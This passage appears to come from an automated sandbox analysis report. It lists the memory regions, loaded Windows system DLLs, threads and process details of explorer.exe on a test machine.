(normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 4928 start_va = 0x7ffaf1040000 end_va = 0x7ffaf11c2fff entry_point = 0x7ffaf1040000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 4929 start_va = 0x7ffaf11d0000 end_va = 0x7ffaf1241fff entry_point = 0x7ffaf11d0000 region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 4930 start_va = 0x7ffaf1380000 end_va = 0x7ffaf1395fff entry_point = 0x7ffaf1380000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 4931 start_va = 0x7ffaf2560000 end_va = 0x7ffaf2627fff entry_point = 0x7ffaf2560000 region_type = mapped_file name = "coremessaging.dll" filename = "\\Windows\\System32\\CoreMessaging.dll" (normalized: "c:\\windows\\system32\\coremessaging.dll") Region: id = 4932 start_va = 0x7ffaf2a00000 end_va = 0x7ffaf2a12fff entry_point = 0x7ffaf2a00000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 4933 start_va = 0x7ffaf2a90000 end_va = 0x7ffaf2ab4fff entry_point = 0x7ffaf2a90000 region_type = mapped_file name = "sppc.dll" filename = "\\Windows\\System32\\sppc.dll" (normalized: "c:\\windows\\system32\\sppc.dll") Region: id = 4934 start_va = 0x7ffaf2ac0000 end_va = 0x7ffaf2ae5fff entry_point = 0x7ffaf2ac0000 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 4935 start_va = 0x7ffaf2d10000 end_va = 0x7ffaf2da5fff entry_point = 0x7ffaf2d10000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 4936 start_va = 0x7ffaf2db0000 end_va = 0x7ffaf2dd6fff entry_point = 0x7ffaf2db0000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 4937 start_va = 0x7ffaf36f0000 end_va = 0x7ffaf36fbfff entry_point = 0x7ffaf36f0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 4938 start_va = 0x7ffaf3960000 end_va = 0x7ffaf3992fff entry_point = 0x7ffaf3960000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4939 start_va = 0x7ffaf3a50000 end_va = 0x7ffaf3a6efff entry_point = 0x7ffaf3a50000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 4940 start_va = 0x7ffaf3d00000 end_va = 0x7ffaf3d16fff entry_point = 0x7ffaf3d00000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 4941 start_va = 0x7ffaf41b0000 end_va = 0x7ffaf41dbfff entry_point = 0x7ffaf41b0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 4942 start_va = 0x7ffaf41e0000 end_va = 0x7ffaf41eafff entry_point = 0x7ffaf41e0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 4943 start_va = 0x7ffaf4260000 end_va = 0x7ffaf4287fff entry_point = 0x7ffaf4260000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 4944 start_va = 0x7ffaf4290000 end_va = 0x7ffaf42fafff entry_point = 0x7ffaf4290000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 4945 start_va = 0x7ffaf4300000 end_va = 0x7ffaf4397fff entry_point = 0x7ffaf4300000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 4946 start_va = 0x7ffaf4440000 end_va = 0x7ffaf4489fff entry_point = 0x7ffaf4440000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 4947 start_va = 0x7ffaf4490000 end_va = 0x7ffaf44a2fff entry_point = 0x7ffaf4490000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 4948 start_va = 0x7ffaf44d0000 end_va = 0x7ffaf44defff entry_point = 0x7ffaf44d0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 4949 start_va = 0x7ffaf4540000 end_va = 0x7ffaf4583fff entry_point = 0x7ffaf4540000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 4950 start_va = 0x7ffaf4590000 end_va = 0x7ffaf4bb7fff entry_point = 0x7ffaf4590000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 4951 start_va = 0x7ffaf4bc0000 end_va = 0x7ffaf4c72fff entry_point = 0x7ffaf4bc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 4952 start_va = 0x7ffaf4e50000 end_va = 0x7ffaf502cfff entry_point = 0x7ffaf4e50000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 4953 start_va = 0x7ffaf5140000 end_va = 0x7ffaf528dfff entry_point = 0x7ffaf5140000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 4954 start_va = 0x7ffaf5290000 end_va = 0x7ffaf53b5fff entry_point = 0x7ffaf5290000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 4955 start_va = 0x7ffaf53c0000 end_va = 0x7ffaf53f5fff entry_point = 0x7ffaf53c0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 4956 start_va = 0x7ffaf55b0000 end_va = 0x7ffaf56f0fff entry_point = 0x7ffaf55b0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 4957 start_va = 0x7ffaf5700000 end_va = 0x7ffaf579cfff entry_point = 0x7ffaf5700000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4958 start_va = 0x7ffaf57a0000 end_va = 0x7ffaf57fafff entry_point = 0x7ffaf57a0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 4959 start_va = 0x7ffaf5800000 end_va = 0x7ffaf5984fff entry_point = 0x7ffaf5800000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 4960 start_va = 0x7ffaf5990000 end_va = 0x7ffaf6eb4fff entry_point = 0x7ffaf5990000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 4961 start_va = 0x7ffaf6ec0000 end_va = 0x7ffaf6f64fff entry_point = 0x7ffaf6ec0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 4962 start_va = 0x7ffaf6f70000 end_va = 0x7ffaf70cbfff entry_point = 0x7ffaf6f70000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 4963 start_va = 0x7ffaf70d0000 end_va = 0x7ffaf717cfff entry_point = 0x7ffaf70d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4964 start_va = 0x7ffaf7190000 end_va = 0x7ffaf724dfff entry_point = 0x7ffaf7190000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 4965 start_va = 0x7ffaf72e0000 end_va = 0x7ffaf755bfff entry_point = 0x7ffaf72e0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 4966 start_va = 0x7ffaf75d0000 end_va = 0x7ffaf7675fff entry_point = 0x7ffaf75d0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4967 start_va = 0x7ffaf7860000 end_va = 0x7ffaf78b0fff entry_point = 0x7ffaf7860000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 4968 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Thread: id = 611 os_tid = 0x2b8 Thread: id = 612 os_tid = 0x474 Thread: id = 613 os_tid = 0x60c Thread: id = 614 os_tid = 0x694 Thread: id = 939 os_tid = 0x7e8 Process: id = "56" image_name = "explorer.exe" filename = "c:\\windows\\explorer.exe" page_root = "0xa77a000" os_pid = "0x820" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "37" os_parent_pid = "0x1cc" cmd_line = "C:\\Windows\\Explorer.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3627 start_va = 0x970000 end_va = 0x97ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000970000" filename = "" Region: id = 3628 start_va = 0x980000 end_va = 0x986fff entry_point = 0x0 region_type = private name = "private_0x0000000000980000" filename = "" Region: id = 3629 start_va = 0x990000 end_va = 0x9a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000990000" filename = "" Region: id = 3630 start_va = 0x9b0000 end_va = 0xa2ffff entry_point = 0x0 region_type = private name = "private_0x00000000009b0000" filename = "" Region: id = 3631 start_va = 0xa30000 end_va = 0xa33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a30000" filename = "" Region: id = 3632 start_va = 0xa40000 end_va = 0xa42fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a40000" filename = "" Region: id = 3633 start_va = 0xa50000 end_va = 0xa51fff entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 3634 start_va = 0xa60000 end_va = 0xa66fff entry_point = 0x0 region_type = private name = "private_0x0000000000a60000" filename = "" Region: id = 3635 start_va = 0xa70000 end_va = 0xa77fff entry_point = 0xa70000 region_type = mapped_file name = "explorer.exe.mui" filename = "\\Windows\\en-US\\explorer.exe.mui" (normalized: "c:\\windows\\en-us\\explorer.exe.mui") Region: id = 3636 start_va = 0xa80000 end_va = 0xa80fff entry_point = 0x0 region_type = private name = "private_0x0000000000a80000" filename = "" Region: id = 3637 start_va = 0xa90000 end_va = 0xa90fff entry_point = 0x0 region_type = private name = "private_0x0000000000a90000" filename = "" Region: id = 3638 start_va = 0xaa0000 end_va = 0xb9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000aa0000" filename = "" Region: id = 3639 start_va = 0xba0000 end_va = 0xc5dfff entry_point = 0xba0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3640 start_va = 0xc60000 end_va = 0xcdffff entry_point = 0x0 region_type = private name = "private_0x0000000000c60000" filename = "" Region: id = 3641 start_va = 0xce0000 end_va = 0xceffff entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 3642 start_va = 0xcf0000 end_va = 0xcf0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000cf0000" filename = "" Region: id = 3643 start_va = 0xd00000 end_va = 0xd00fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d00000" filename = "" Region: id = 3644 start_va = 0xd10000 end_va = 0xd10fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d10000" filename = "" Region: id = 3645 start_va = 0xd20000 end_va = 0xd20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d20000" filename = "" Region: id = 3646 start_va = 0xd30000 end_va = 0xd33fff entry_point = 0xd30000 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 3647 start_va = 0xd40000 end_va = 0xd52fff entry_point = 0xd40000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001b.db" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000001b.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001b.db") Region: id = 3648 start_va = 0xd60000 end_va = 0xd60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d60000" filename = "" Region: id = 3649 start_va = 0xd70000 end_va = 0xd7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d70000" filename = "" Region: id = 3650 start_va = 0xd80000 end_va = 0xf07fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d80000" filename = "" Region: id = 3651 start_va = 0xf10000 end_va = 0x1090fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f10000" filename = "" Region: id = 3652 start_va = 0x10a0000 end_va = 0x249ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010a0000" filename = "" Region: id = 3653 start_va = 0x24a0000 end_va = 0x27d6fff entry_point = 0x24a0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3654 start_va = 0x27f0000 end_va = 0x27f1fff entry_point = 0x27f0000 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 3655 start_va = 0x2800000 end_va = 0x2801fff entry_point = 0x2800000 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 3656 start_va = 0x2810000 end_va = 0x2811fff entry_point = 0x2810000 region_type = mapped_file name = "iconcache_idx.db" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db") Region: id = 3657 start_va = 0x2820000 end_va = 0x288bfff entry_point = 0x0 region_type = private name = "private_0x0000000002820000" filename = "" Region: id = 3658 start_va = 0x2890000 end_va = 0x2891fff entry_point = 0x2890000 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 3659 start_va = 0x28a0000 end_va = 0x28a1fff entry_point = 0x28a0000 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 3660 start_va = 0x28b0000 end_va = 0x28b1fff entry_point = 0x28b0000 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 3661 start_va = 0x28e0000 end_va = 0x295ffff entry_point = 0x0 region_type = private name = "private_0x00000000028e0000" filename = "" Region: id = 3662 start_va = 0x2960000 end_va = 0x29dffff entry_point = 0x0 region_type = private name = "private_0x0000000002960000" filename = "" Region: id = 3663 start_va = 0x29e0000 end_va = 0x29fcfff entry_point = 0x29e0000 region_type = mapped_file name = "{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x0000000000000033.db" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\Caches\\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.1.ver0x0000000000000033.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\caches\\{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x0000000000000033.db") Region: id = 3664 start_va = 0x2a00000 end_va = 0x2a60fff entry_point = 0x2a00000 region_type = mapped_file name = "shell32.dll.mui" filename = "\\Windows\\System32\\en-US\\shell32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\shell32.dll.mui") Region: id = 3665 start_va = 0x2a70000 end_va = 0x2a72fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002a70000" filename = "" Region: id = 3666 start_va = 0x2a80000 end_va = 0x2a82fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002a80000" filename = "" Region: id = 3667 start_va = 0x2a90000 end_va = 0x2ab9fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002a90000" filename = "" Region: id = 3668 start_va = 0x2ac0000 end_va = 0x2b9efff entry_point = 0x2ac0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 3669 start_va = 0x2bb0000 end_va = 0x2bb0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002bb0000" filename = "" Region: id = 3670 start_va = 0x2bd0000 end_va = 0x2bd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002bd0000" filename = "" Region: id = 3671 start_va = 0x2bf0000 end_va = 0x2bf1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002bf0000" filename = "" Region: id = 3672 start_va = 0x2c20000 end_va = 0x2c23fff entry_point = 0x2c20000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 3673 start_va = 0x2c30000 end_va = 0x2c32fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002c30000" filename = "" Region: id = 3674 start_va = 0x2c40000 end_va = 0x2c5dfff entry_point = 0x2c40000 region_type = mapped_file name = "{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x0000000000000034.db" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\Caches\\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.1.ver0x0000000000000034.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\caches\\{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x0000000000000034.db") Region: id = 3675 start_va = 0x2c60000 end_va = 0x2c62fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002c60000" filename = "" Region: id = 3676 start_va = 0x2c70000 end_va = 0x2c8bfff entry_point = 0x2c70000 region_type = mapped_file name = "{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x0000000000000036.db" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\Caches\\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.1.ver0x0000000000000036.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\caches\\{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x0000000000000036.db") Region: id = 3677 start_va = 0x2c90000 end_va = 0x2c92fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002c90000" filename = "" Region: id = 3678 start_va = 0x2ca0000 end_va = 0x2d1ffff entry_point = 0x0 region_type = private name = "private_0x0000000002ca0000" filename = "" Region: id = 3679 start_va = 0x2d20000 end_va = 0x2d21fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d20000" filename = "" Region: id = 3680 start_va = 0x2d30000 end_va = 0x2d31fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d30000" filename = "" Region: id = 3681 start_va = 0x2d40000 end_va = 0x2d41fff entry_point = 0x2d40000 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll") Region: id = 3682 start_va = 0x2d50000 end_va = 0x2d54fff entry_point = 0x2d50000 region_type = mapped_file name = "oleaccrc.dll.mui" filename = "\\Windows\\System32\\en-US\\oleaccrc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\oleaccrc.dll.mui") Region: id = 3683 start_va = 0x2d60000 end_va = 0x2e17fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d60000" filename = "" Region: id = 3684 start_va = 0x2e20000 end_va = 0x2e23fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002e20000" filename = "" Region: id = 3685 start_va = 0x2e30000 end_va = 0x2f2ffff entry_point = 0x0 region_type = private name = "private_0x0000000002e30000" filename = "" Region: id = 3686 start_va = 0x2f30000 end_va = 0x302ffff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 3687 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 3688 start_va = 0x3040000 end_va = 0x407ffff entry_point = 0x3040000 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 3689 start_va = 0x4080000 end_va = 0x4086fff entry_point = 0x0 region_type = private name = "private_0x0000000004080000" filename = "" Region: id = 3690 start_va = 0x4090000 end_va = 0x4090fff entry_point = 0x0 region_type = private name = "private_0x0000000004090000" filename = "" Region: id = 3691 start_va = 0x40a0000 end_va = 0x40a0fff entry_point = 0x0 region_type = private name = "private_0x00000000040a0000" filename = "" Region: id = 3692 start_va = 0x40b0000 end_va = 0x40b0fff entry_point = 0x0 region_type = private name = "private_0x00000000040b0000" filename = "" Region: id = 3693 start_va = 0x40c0000 end_va = 0x413ffff entry_point = 0x0 region_type = private name = "private_0x00000000040c0000" filename = "" Region: id = 3694 start_va = 0x4140000 end_va = 0x4141fff entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 3695 start_va = 0x4150000 end_va = 0x4150fff entry_point = 0x0 region_type = private name = "private_0x0000000004150000" filename = "" Region: id = 3696 start_va = 0x4160000 end_va = 0x4160fff entry_point = 0x0 region_type = private name = "private_0x0000000004160000" filename = "" Region: id = 3697 start_va = 0x4170000 end_va = 0x4170fff entry_point = 0x0 region_type = private name = "private_0x0000000004170000" filename = "" Region: id = 3698 start_va = 0x4180000 end_va = 0x4182fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004180000" filename = "" Region: id = 3699 start_va = 0x4190000 end_va = 0x4193fff entry_point = 0x4190000 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 3700 start_va = 0x41a0000 end_va = 0x41a0fff entry_point = 0x0 region_type = private name = "private_0x00000000041a0000" filename = "" Region: id = 3701 start_va = 0x41b0000 end_va = 0x41b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000041b0000" filename = "" Region: id = 3702 start_va = 0x41c0000 end_va = 0x41c0fff entry_point = 0x0 region_type = private name = "private_0x00000000041c0000" filename = "" Region: id = 3703 start_va = 0x41d0000 end_va = 0x41d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000041d0000" filename = "" Region: id = 3704 start_va = 0x41e0000 end_va = 0x4218fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000041e0000" filename = "" Region: id = 3705 start_va = 0x4220000 end_va = 0x4222fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004220000" filename = "" Region: id = 3706 start_va = 0x4230000 end_va = 0x4230fff entry_point = 0x0 region_type = private name = "private_0x0000000004230000" filename = "" Region: id = 3707 start_va = 0x4240000 end_va = 0x4240fff entry_point = 0x0 region_type = private name = "private_0x0000000004240000" filename = "" Region: id = 3708 start_va = 0x4250000 end_va = 0x42cffff entry_point = 0x0 region_type = private name = "private_0x0000000004250000" filename = "" Region: id = 3709 start_va = 0x42d0000 end_va = 0x434ffff entry_point = 0x0 region_type = private name = "private_0x00000000042d0000" filename = "" Region: id = 3710 start_va = 0x4350000 end_va = 0x4352fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004350000" filename = "" Region: id = 3711 start_va = 0x4360000 end_va = 0x4363fff entry_point = 0x4360000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 3712 start_va = 0x4370000 end_va = 0x43b2fff entry_point = 0x4370000 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000f.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000f.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000f.db") Region: id = 3713 start_va = 0x43c0000 end_va = 0x43c3fff entry_point = 0x43c0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 3714 start_va = 0x43d0000 end_va = 0x445afff entry_point = 0x43d0000 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 3715 start_va = 